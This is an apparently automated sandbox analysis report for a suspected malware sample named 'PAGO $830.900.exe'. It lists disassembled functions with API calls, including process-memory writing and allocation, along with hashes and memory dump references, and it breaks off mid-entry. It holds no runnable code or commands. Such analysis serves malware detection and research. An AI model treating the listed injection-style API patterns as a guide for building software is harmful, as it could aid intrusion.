                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 804c7fe86edcff761e253693e4b0497c62c38d5db34faca6d06c63cf5f290066
                                                          • Instruction ID: 82761efbbbd0c1e704d815b8fecd4b9ce2e885b687f96cc92924ff8c19fe3cc9
                                                          • Opcode Fuzzy Hash: 804c7fe86edcff761e253693e4b0497c62c38d5db34faca6d06c63cf5f290066
                                                          • Instruction Fuzzy Hash: AB012931D0261DDBCF00AFA6DC58AEDBB78FB0D701F110556E541B6251CB3196988BB1
                                                          Function 00DD103D Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1058
                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1064
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1073
                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD107A
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD1091
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 37899afc954b795e828742ddf3bd97f68575cfae65a3f6bc7799cbb7ddb2f652
                                                          • Instruction ID: f40c22996762e73cb929f5d34b2468495c49538cfafc2cdd32c3287b36e237aa
                                                          • Opcode Fuzzy Hash: 37899afc954b795e828742ddf3bd97f68575cfae65a3f6bc7799cbb7ddb2f652
                                                          • Instruction Fuzzy Hash: C2016979200305BFDB115FB6DC48E6A3A7EEF893A0B280515F945E7360DA32DC808A60
                                                          Function 00DD0EF8 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0F0E
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0F1A
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0F29
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DD0F30
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD0F46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 7c24d997bb26400673829e0caba3bf1426c1a314b71ec379233d7584f7c22dd4
                                                          • Instruction ID: 99fd5293ca8a7181fd44692824af99f7e72f58e8fad7b3460b25b41227ca2a50
                                                          • Opcode Fuzzy Hash: 7c24d997bb26400673829e0caba3bf1426c1a314b71ec379233d7584f7c22dd4
                                                          • Instruction Fuzzy Hash: F0F04935200305AFDB214FA6EC4DF5A3BAEEF89760F244515FA49E6291CA72DC848A60
                                                          Function 00DD0F58 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD0F6E
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F7A
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F89
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F90
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0FA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 7202e21b5cf10006b6837e9a152ef056165dcdfffac932741b13fdd9f61a782b
                                                          • Instruction ID: cf5cf3560b04e6ff2eec8ad5f61ae02f14bb5d00955c4f74f679d97ccd0f80ae
                                                          • Opcode Fuzzy Hash: 7202e21b5cf10006b6837e9a152ef056165dcdfffac932741b13fdd9f61a782b
                                                          • Instruction Fuzzy Hash: EBF04935200305AFDB214FA6EC49F5A3BAEEFC9760F250515FA45E6290CA72D8948A60
                                                          Function 00DE022D Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE0242
                                                          • CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE024F
                                                          • CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE025C
                                                          • CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE0269
                                                          • CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE0276
                                                          • CloseHandle.KERNEL32(?,?,?,?,00DE009B,?,00DE321A,?,00000001,00DB311E,?), ref: 00DE0283
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 71a0577422b21430a47399bc92f3f1abdf39dd7cf24bad03da80750e8967ab09
                                                          • Instruction ID: 1f4acb0da11bb1422ad7d8219983882cb489a68735ed624d5985eca714405edf
                                                          • Opcode Fuzzy Hash: 71a0577422b21430a47399bc92f3f1abdf39dd7cf24bad03da80750e8967ab09
                                                          • Instruction Fuzzy Hash: BA01AE71800B95DFCB31AF66D880416FBF9BF602153198A3ED29652931C3B1A988DFA4
                                                          Function 00DAD6DA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00DAD6F2
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DAD704
                                                          • _free.LIBCMT ref: 00DAD716
                                                          • _free.LIBCMT ref: 00DAD728
                                                          • _free.LIBCMT ref: 00DAD73A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 7bd6443e5c58e8f4a4442cc2b0f7176e3ea7b6d07fb46d414a2439b0a47d9509
                                                          • Instruction ID: 777c761f05cc47114ef55659830096fb22baddbe2ca93903711a97221d9ee43e
                                                          • Opcode Fuzzy Hash: 7bd6443e5c58e8f4a4442cc2b0f7176e3ea7b6d07fb46d414a2439b0a47d9509
                                                          • Instruction Fuzzy Hash: 22F04F7264524DAB8628EB5AF8C9C2777DEFB46710FA90805F04AF7941CB20FC844B74
                                                          Function 00DD5B9A Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00DD5BAE
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00DD5BC5
                                                          • MessageBeep.USER32(00000000), ref: 00DD5BDD
                                                          • KillTimer.USER32(?,0000040A), ref: 00DD5BF9
                                                          • EndDialog.USER32(?,00000001), ref: 00DD5C13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 85a09ba741ef684bd61f0ecb6b7d91e3673c0e91eb95a32fb8e6c8b82769e15e
                                                          • Instruction ID: 7394ae7413c44372674e4350e9b818cdad82185dc3fc7f3b19fbb769b4b2bdeb
                                                          • Opcode Fuzzy Hash: 85a09ba741ef684bd61f0ecb6b7d91e3673c0e91eb95a32fb8e6c8b82769e15e
                                                          • Instruction Fuzzy Hash: 19018630510704AFEB315B55ED4EF9677B8BB04B05F08065AA587710E1DBF2A9D88BA1
                                                          Function 00DA2230 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00DA224E
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DA2260
                                                          • _free.LIBCMT ref: 00DA2273
                                                          • _free.LIBCMT ref: 00DA2284
                                                          • _free.LIBCMT ref: 00DA2295
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 5dbe58e501217f89389ba69c2cab6ca48628bb01dd2b4be08f477c2c5871e496
                                                          • Instruction ID: 677db7af653aa5d87f37bc6d9445fe7836e2441338b3f09858b59d4a54a59fb4
                                                          • Opcode Fuzzy Hash: 5dbe58e501217f89389ba69c2cab6ca48628bb01dd2b4be08f477c2c5871e496
                                                          • Instruction Fuzzy Hash: 9EF090786402118F8B15AF2BAC068193B64F71BB51B060166F510F2370C730558FAFE9
                                                          Function 00D8AA4B Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 00D8AA5A
                                                          • StrokeAndFillPath.GDI32(?,?,00DC7BB4,00000000,?,?,?), ref: 00D8AA76
                                                          • SelectObject.GDI32(?,00000000), ref: 00D8AA89
                                                          • DeleteObject.GDI32 ref: 00D8AA9C
                                                          • StrokePath.GDI32(?), ref: 00D8AAB7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: 67adaed6a51b1e9b7b4847c8b4e147898972c9df78e54c0516d530d72e492fc9
                                                          • Instruction ID: fdac4a608f5b2e9478b777859c1f82111f5f04c713ab0ea044d29c14398b3111
                                                          • Opcode Fuzzy Hash: 67adaed6a51b1e9b7b4847c8b4e147898972c9df78e54c0516d530d72e492fc9
                                                          • Instruction Fuzzy Hash: 02F03C34002204EFEB15AF6AED1C7643F60AB82366F148355F665750F0C73588DADF21
                                                          Function 00DA0ED7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: __freea$_free
                                                          • String ID: a/p$am/pm
                                                          • API String ID: 3432400110-3206640213
                                                          • Opcode ID: 71983b4517cb3c5bd768104856ab05461debede95e81facb27446d6e6271422d
                                                          • Instruction ID: 9642922dcdb6c65d1ca2cd46b877ea83eb0b4581fed9962e7b9e6863ff699c5c
                                                          • Opcode Fuzzy Hash: 71983b4517cb3c5bd768104856ab05461debede95e81facb27446d6e6271422d
                                                          • Instruction Fuzzy Hash: 15D1E379900206DADB249FA8C8467FEBBB1FF07310F284159E941AB691D375DD80CBB9
                                                          Function 00DF60F7 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D901C2: EnterCriticalSection.KERNEL32(00E4070C,?,?,?,00D81744,00E42580,?,?,?), ref: 00D901CD
                                                            • Part of subcall function 00D901C2: LeaveCriticalSection.KERNEL32(00E4070C,?,00D81744,00E42580,?,?,?), ref: 00D9020A
                                                            • Part of subcall function 00D90023: __onexit.LIBCMT ref: 00D90029
                                                          • __Init_thread_footer.LIBCMT ref: 00DF615F
                                                            • Part of subcall function 00D90178: EnterCriticalSection.KERNEL32(00E4070C,?,?,00DC556E,00E42540,?,?,?,?,?), ref: 00D90182
                                                            • Part of subcall function 00D90178: LeaveCriticalSection.KERNEL32(00E4070C,?,00DC556E,00E42540,?,?,?,?,?), ref: 00D901B5
                                                            • Part of subcall function 00DE34BA: LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DE3502
                                                            • Part of subcall function 00DE34BA: LoadStringW.USER32(?,?,00000FFF,?), ref: 00DE3528
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                          • String ID: x#$x#$x#
                                                          • API String ID: 1072379062-1894725482
                                                          • Opcode ID: 50a483c40ed2c944e55e93ed5add1f458df08ac9e7828530c9eed210b5bc77bb
                                                          • Instruction ID: 48fcbea9e0a8310426b6aa3c564da87a9b5feba7900c4f4d84ed761133d0470e
                                                          • Opcode Fuzzy Hash: 50a483c40ed2c944e55e93ed5add1f458df08ac9e7828530c9eed210b5bc77bb
                                                          • Instruction Fuzzy Hash: 11C15C71A04209AFCB14EF58C891EBEB7B9EF54300F158059FA45AB691D770E945CBB0
                                                          Function 00D74DF1 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: 3$A$_
                                                          • API String ID: 176396367-1956071190
                                                          • Opcode ID: 3cdae6353d5f23509b2c5700675db4a877681ac5c51803ca748e6c730448f1e3
                                                          • Instruction ID: 48c1a0036bb88f65e0ed4e974b1a6c0f7227fa1b7848a89c34b520f1e90425a3
                                                          • Opcode Fuzzy Hash: 3cdae6353d5f23509b2c5700675db4a877681ac5c51803ca748e6c730448f1e3
                                                          • Instruction Fuzzy Hash: 73812730A00211DACF259F58C4817BDB7A1FF54720F28C51AE99A9B2D1F7B4CA8197B1
                                                          Function 00DD265A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DDB321: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD2114,?,?,00000034,00000800,?,00000034), ref: 00DDB34B
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DD26A4
                                                            • Part of subcall function 00DDB2EC: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD2143,?,?,00000800,?,00001073,00000000,?,?), ref: 00DDB316
                                                            • Part of subcall function 00DDB248: GetWindowThreadProcessId.USER32(?,?), ref: 00DDB273
                                                            • Part of subcall function 00DDB248: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DD20D8,00000034,?,?,00001004,00000000,00000000), ref: 00DDB283
                                                            • Part of subcall function 00DDB248: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DD20D8,00000034,?,?,00001004,00000000,00000000), ref: 00DDB299
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD2711
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD275E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: 63e7bf21f955c9cd3926dae4b469779acdae92fefbbd2060a3361be0e89118bc
                                                          • Instruction ID: 89489beab61604abf75f25452a92c2ea5194d8edf14503971a39275c08cb715b
                                                          • Opcode Fuzzy Hash: 63e7bf21f955c9cd3926dae4b469779acdae92fefbbd2060a3361be0e89118bc
                                                          • Instruction Fuzzy Hash: 48413D72900218BFDB10DFA4CD85EEEBBB8EB19710F104056F945B7281DA716E45CB71
                                                          Function 00DA16BE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PAGO $830.900.exe,00000104), ref: 00DA16F9
                                                          • _free.LIBCMT ref: 00DA17C4
                                                          • _free.LIBCMT ref: 00DA17CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Users\user\Desktop\PAGO $830.900.exe
                                                          • API String ID: 2506810119-2361314617
                                                          • Opcode ID: 343652d487c7c5e230c7daec7342d2ef983f965b59a5e9d57041559059e3a8a3
                                                          • Instruction ID: a1a6e7a7d7af2fdfca3605e1f8e775ba2fa75c2e828a8c65f4ab7cb30387e288
                                                          • Opcode Fuzzy Hash: 343652d487c7c5e230c7daec7342d2ef983f965b59a5e9d57041559059e3a8a3
                                                          • Instruction Fuzzy Hash: F031A679A04218EFCB11DF99D885D9EBBFCEB86710F1441A6E404D7210D7B08E84DBB4
                                                          Function 00DDC19B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DDC224
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00DDC26A
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E41990,013958F8), ref: 00DDC2B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
